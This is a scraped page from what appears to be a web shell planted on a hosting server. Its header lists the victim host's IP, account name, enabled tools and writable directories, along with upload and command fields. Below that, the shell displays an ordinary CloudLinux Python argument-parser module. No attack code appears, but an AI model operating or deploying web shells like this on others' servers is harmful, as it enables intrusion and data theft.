Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.15.148.57
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib/python3.11/site-packages/cllimits/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib/python3.11/site-packages/cllimits/lib/arg_parsers.py
# coding:utf-8

# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2022 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

from typing import Tuple, Union

from docopt import DocoptExit, docopt
from schema import Schema, And, Use, Or, SchemaError

from clcommon.const import Feature
from clcommon.cpapi import is_panel_feature_supported

from .utils import VALUES_STR

PROG_NAME = "cloudlinux-limits"

AVAILABLE_LVE_KEYS = {"speed", "nproc", "pmem", "vmem", "maxEntryProcs", "io", "iops"}
AVAILABLE_LVP_KEYS = {"speed", "nproc", "pmem", "maxEntryProcs", "io", "iops"}
AVAILABLE_QUOTA_KEYS = {"inodes"}
AVAILABLE_MYSQL_KEYS = {"mysql-cpu", "mysql-io"}
AVAILABLE_KEYS = AVAILABLE_LVE_KEYS | AVAILABLE_QUOTA_KEYS | AVAILABLE_MYSQL_KEYS | AVAILABLE_LVP_KEYS
AVAILABLE_DEFAULTS = AVAILABLE_KEYS | {"all"}
if is_panel_feature_supported(Feature.LVE):
    AVAILABLE_LIMITS = AVAILABLE_KEYS | {"mysql-gov", "mysql-restrict", "cagefs"}
else:
    AVAILABLE_LIMITS = AVAILABLE_QUOTA_KEYS | {"cagefs"}
AVAILABLE_MYSQL_KEYS_ALL = AVAILABLE_MYSQL_KEYS | {"mysql-restrict", "mysql-unrestrict-all", "mysql-gov"}
ADMIN_ONLY_OPTIONS = ["--mysql-restrict", "--mysql-unrestrict-all", "--mysql-gov", "--mysql-io",
                      "--mysql-cpu", "--cagefs", "--inodes"]


def _default_keys_validate(keys):
    """
    Validate limits keys for --default
    """
    return len(set(keys) - AVAILABLE_DEFAULTS) == 0


def _limits_keys_validate(keys):
    """
    Validate limits keys
    """
    return len(set(keys.split(",")) - set(AVAILABLE_LIMITS)) == 0


# uncomment this for add full edit mode
# gov_int_list = And(Use(lambda x:x.split(",")), lambda x:len(x) == 4,
#                    Use(lambda x:map(int, x)))
global_schema = Schema({
    "set": bool,
    "get": bool,
    "disable-reseller-limits": bool,
    "enable-reseller-limits": bool,
    "--json": And(bool, lambda x: x, error="use --json option, other modes currently unsupported"),
    "--human-readable-numbers": bool,
    "--unlimited": bool,
    "--default": Or(None, And(Use(lambda x: x.split(',')), _default_keys_validate), error="Invalid keys"),
    "--save-all-parameters": bool,
    "--lve-id": Or(None, And(Use(int), lambda x: int(x) >= 0),
                   And(Use(lambda x: str(x).lower()),
                       lambda x: x == "default"),
                   error="--lve-id must be non-negative integer value or 'default'"),
    "--reseller-id": Or(None, And(Use(int), lambda x: int(x) >= 0),
                        error="--reseller-id must be non-negative integer value"),
    "--reseller-name": Or(None, And(str, lambda x: not x.isdigit()), error="Invalid reseller name"),
    "--all": bool,
    "--for-reseller": Or(None, And(str, lambda x: not x.isdigit()), error="Invalid reseller name"),
    "--username": Or(None, str),
    "--domain": Or(None, str),
    "--limits": Or(None, _limits_keys_validate, error="Invalid keys"),
    "--mysql-gov": Or(None, lambda x: x in ["ignored", "watched"],
                      error=f"{VALUES_STR}: 'ignored', 'watched'"),
    "--cagefs": Or(None, lambda x: x in ["enabled", "disabled"],
                   error=f"{VALUES_STR}: 'enabled', 'disabled'"),
    "--mysql-restrict": Or(None, lambda x: x in ["restricted", "unrestricted"],
                           error=f"{VALUES_STR}: 'restricted', 'unrestricted'"),
    "--mysql-unrestrict-all": bool,
    "--speed": Or(None, str),
    "--pmem": Or(None, str),
    "--vmem": Or(None, str),
    "--nproc": Or(None, str),
    "--io": Or(None, str),
    "--iops": Or(None, str),
    "--maxEntryProcs": Or(None, str),
    "--mysql-cpu": Or(None, And(Use(int), lambda x: x >= 0),
                      error="--mysql-cpu must be non-negative integer value"),
    # uncomment this for add full edit mode
    # "--mysql-io": Or(None, And(Use(int), lambda x:x >= 0), gov_int_list,
    "--mysql-io": Or(None, And(Use(int), lambda x: x >= 0),
                     error="--mysql-io must be non-negative integer value"),
    # uncomment this for add full edit mode
    # "--mysql-read": Or(None, And(Use(int), lambda x:x >= 0), gov_int_list,
    #                    error="--mysql-read must be non-negative integer value or 4 int numbers with comma"),
    # "--mysql-write": Or(None, And(Use(int), lambda x:x >= 0), gov_int_list,
    #                     error="--mysql-write must be non-negative integer value or 4 int numbers with comma"),
    "--inodes": Or(None, str),
    "--help": bool,
})

USAGE_CMDS = (
    "set [--json] (--lve-id <int> | --username <str>) (--unlimited) [--for-reseller <str>]",

    "set [--json] (--lve-id <int> | --username <str> | --reseller-name <str>) (--default <str>)",

    "set [--json] (--lve-id <int> | --username <str>) "
    "(--mysql-gov <ignored,watched> | --cagefs <enabled,disabled> | --mysql-restrict <restricted,unrestricted>)",

    "set [--json] (--mysql-unrestrict-all)",

    "set [--json] (--lve-id <int> | --username <str>) "
    "[--speed <str> --io <str> --nproc <str> --pmem <str> --vmem <str> --iops <str> --inodes <N,M> "
    "--maxEntryProcs <str> --mysql-cpu <int> --mysql-io <int> --save-all-parameters]",

    "set [--json] (--lve-id <int> | --username <str> | --reseller-name <str>) "
    "[--speed <str> --io <str> --nproc <str> --pmem <str> --vmem <str> --iops <str> --maxEntryProcs <str>] "
    "[--default <str>] [--for-reseller <str>]",

    "set [--json] (--reseller-name <str>) (--unlimited)",

    "[get] [--json] [--lve-id <int> | --username <str> | --reseller-name <str> | --domain <str>] "
    "[--limits=<keys>] [--human-readable-numbers] [--for-reseller <str>]",

    "disable-reseller-limits (--reseller-id <int> | --reseller-name <str>) [--json]",

    "enable-reseller-limits ((--reseller-id <int> | --reseller-name <str>) | --all) [--json]",

    "(-h | --help)",
)
USAGE = "\n    ".join(f"{PROG_NAME} {cmd}" for cmd in USAGE_CMDS).strip()


class CloudlinuxLimitsOptsParser:
    """
    Parse arguments for cloudlinux-limits command
    :param argv: sys.argv
    :param _is_json_need: sys.argv contains --json key
    :return cortege: (error_flag, s_message)
    """
    docstring = f"""Utility to get/set any Cloudlinux limits

Usage:
    {USAGE}

Options:
    --json                              Return data in JSON format.
    --lve-id <int>                      LVE id. will display record only for that LVE id.
    --username <str>                    Execute command only for specific user.
    --reseller-name <str>               Execute command only for specific reseller.
    --reseller-id <int>                 Execute command only for specific reseller.
    --all                               Execute command for all resellers
    --for-reseller <str>                Use supplied reseller for get/set data.
    --domain <str>                      Show data only for specific domain
    --limits <keys>                     Available keys: speed,nproc,pmem,vmem,maxEntryProcs,io,
                                                        iops,mysql-gov,mysql-cpu,mysql-io,cagefs,inodes
    --human-readable-numbers            Return PMEM and VMEM limits in KBytes, MBytes or GBytes
    --unlimited                         Set all limits to unlimited.
    --default [limits]                  Reset limits to the Package defaults.
                                        List of comma-separated limits to reset them to default or "all"
    --mysql-gov <ignored|watched>       Monitor or ignore by MySQL governor.
    --cagefs <enabled|disabled>         Enable or disable CageFS for a user.
    --mysql-restrict <[un]restricted>   Set user restrict status with dbctl (restricted or unrestricted).
    --mysql-unrestrict-all              Unrestrict all restricted users with dbctl.
    --speed <str>                       Limit CPU usage for LVE | LVP.
    --pmem <str>                        Limit physical memory usage for applications inside LVE | LVP.
    --vmem <str>                        Limit virtual memory for applications inside LVE.
    --nproc <str>                       Limit number of processes for LVE | LVP.
    --io <str>                          Define io limits for LVE | LVP (KB/s).
    --iops <str>                        Limit io per second for LVE | LVP.
    --maxEntryProcs <str>               Limit number of entry processes for LVE | LVP.
    --mysql-cpu <int>                   Set MySQL governor CPU limit (pct).
    --mysql-io <int>                    Set MySQL governor IO limit (read + write MB/s)
    --inodes <N,M>                      Set inode limits. N - soft, M - hard.
    --save-all-parameters               Save all parameters even if they match with defaults settings.
    -h, --help                          Show this help message and exit
"""

    # add this parameters to docstring when need add read/write/cpu full edit mode
    # this line for Usage block
    # {0} set [--json] (--lve-id <int> | --username <str>) \
    #     [--speed <int> --io <int> --nproc <int> --pmem <int> --vmem <int> --iops <int> --inodes <N,M> \
    #     --maxEntryProcs <int> --mysql-cpu <int:int,int,int,int> --mysql-read <int:int,int,int,int> \
    #     --mysql-write <int:int,int,int,int> --mysql-io <int:int,int,int,int> --save-all-parameters]
    # this lines for Options block
    # --mysql-cpu <int:int,int,int,int>    Set MySQL governor CPU limit (pct).
    # --mysql-io <int:int,int,int,int>     Set MySQL governor IO limit (read + write KB/s)
    # --mysql-read <int:int,int,int,int>   Set MySQL governor read limit (KB/s)
    # --mysql-write <int:int,int,int,int>  Set MySQL governor write limit (KB/s)

    commands = ("set", "get", "disable-reseller-limits", "enable-reseller-limits")

    @staticmethod
    def _is_option_compatible_with_admins(option: str, argv: list) -> Tuple[bool, str]:
        """
        Checks options compatibility with admin options
        :return: Cortege (flag, message)
        flag: True/False - compatible/not compatible
        message - comment if flag is False
        """
        option_found = False
        admin_option_name = ""
        for arg in argv:
            if arg.startswith(option):
                option_found = True
                continue
            if not admin_option_name:
                for admin_option in ADMIN_ONLY_OPTIONS:
                    if arg.startswith(admin_option):
                        admin_option_name = admin_option
        if option_found and admin_option_name:
            return False, f"ERROR: option '{admin_option_name}' is not compatible with '--for-reseller'"
        return True, ""

    def _perform_checks_before_docopt(self, argv: list) -> Tuple[bool, str]:
        """
        Performs checks before parsing arguments
        """
        is_compatible, message = self._is_option_compatible_with_admins("--for-reseller", argv)
        return is_compatible, message

    def _perform_checks_after_docopt(self, args: dict) -> Tuple[bool, str]:
        """
        Performs checks after parsing arguments
        """
        # cloudlinux-limits set/get --json --reseller-name=reseller --for-reseller=reseller -- ERROR
        if args["--reseller-name"] and args["--for-reseller"]:
            return False, "ERROR: '--reseller-name' and '--for-reseller' cannot be used together"
        return True, ""

    def _apply_docopt(self, argv: list, is_json: bool) -> Tuple[dict, str]:
        """
        Applies docopt to parse utility arguments.
        Performs checks before and after parsing
        """
        ok, message = self._perform_checks_before_docopt(argv)
        if not ok:
            return {}, message
        try:
            args = docopt(self.docstring, argv)
        except DocoptExit:
            s_error_string = "ERROR: Invalid parameter passed or required parameter is missing"
            if not is_json:
                s_error_string += "\n\n" + self.docstring
            return {}, s_error_string

        ok, message = self._perform_checks_after_docopt(args)
        if not ok:
            return {}, message
        return args, ""

    @staticmethod
    def _get_schema() -> Schema:
        """
        Returns schema that should be used to validate parsed arguments
        """
        return global_schema

    @staticmethod
    def _validate_schema(schema: Schema, args: dict) -> Tuple[dict, str]:
        """
        Validate parsed arguments with provided schema
        """
        try:
            args = schema.validate(args)
        except SchemaError as e:
            return {}, str(e)
        return args, ""

    def parse_args(self, argv: list, is_json: bool = False) -> Tuple[bool, Union[str, dict]]:
        """
        Parses and validates arguments passed to the utility
        """
        args, message = self._apply_docopt(argv, is_json)
        if not args:
            return False, message
        # if command was not specified, use `get` command
        if not any(args.get(command) for command in self.commands):
            args["get"] = True

        schema = self._get_schema()
        args, message = self._validate_schema(schema, args)
        if not args:
            return False, message
        return True, args


class CloudlinuxLimitsNoLveOptsParser(CloudlinuxLimitsOptsParser):
    docstring = f"""Utility to get/set any Cloudlinux limits

Usage:
    {PROG_NAME} set [--json] (--lve-id <int> | --username <str>) (--cagefs <enabled,disabled>)
    {PROG_NAME} set [--json] (--lve-id <int> | --username <str>) (--unlimited)
    {PROG_NAME} set [--json] (--lve-id <int> | --username <str>) (--default <str>)
    {PROG_NAME} set [--json] (--lve-id <int> | --username <str>) [--inodes <N,M> --save-all-parameters]
    {PROG_NAME} [get] [--json] [--lve-id <int> | --username <str> | --domain <str>] [--limits=<keys>]
    {PROG_NAME} (-h | --help)

Options:
    --json                              Return data in JSON format.
    --lve-id <int>                      LVE id. will display record only for that LVE id.
    --username <str>                    Execute command only for specific user.
    --cagefs <enabled|disabled>         Enable or disable CageFS for a user.
    --unlimited                         Set supported limits to unlimited.
    --default [limits]                  Reset supported limits to the Package defaults.
                                        List of comma-separated limits to reset them to default or "all"
    --domain <str>                      Show data only for specific domain
    --limits <keys>                     Available keys: inodes
    --inodes <N,M>                      Set inode limits. N - soft, M - hard.
    --save-all-parameters               Save all parameters even if they match with defaults settings.
    -h, --help                          Show this help message and exit
"""

    commands = ("set", "get")

    def _perform_checks_before_docopt(self, argv: list) -> Tuple[bool, str]:
        # no checks to be performed
        return True, ""

    def _perform_checks_after_docopt(self, args: dict) -> Tuple[bool, str]:
        # no checks to be performed
        return True, ""

    @staticmethod
    def _get_schema() -> Schema:
        # limit schema to the given options only, other options are not needed
        schema_options = {"set", "get", "--json", "--lve-id", "--username", "--cagefs", "--domain",
                          "--unlimited", "--default", "--limits", "--inodes", "--save-all-parameters", "--help"}
        options = {
            option: value for option, value in global_schema.schema.items()
            if option in schema_options
        }
        return Schema(options)

    def parse_args(self, argv: list, is_json: bool = False) -> Tuple[bool, Union[str, dict]]:
        ok, args = super().parse_args(argv, is_json)
        if not ok:
            return False, args
        # fill parsed arguments dictionary with params from global schema
        # using negative values (False or None)
        # do this because these parametes can be checked in the utility
        for key, value in global_schema.schema.items():
            args.setdefault(key, False if value is bool else None)
        return True, args

Youez - 2016 - github.com/yon3zu
LinuXploit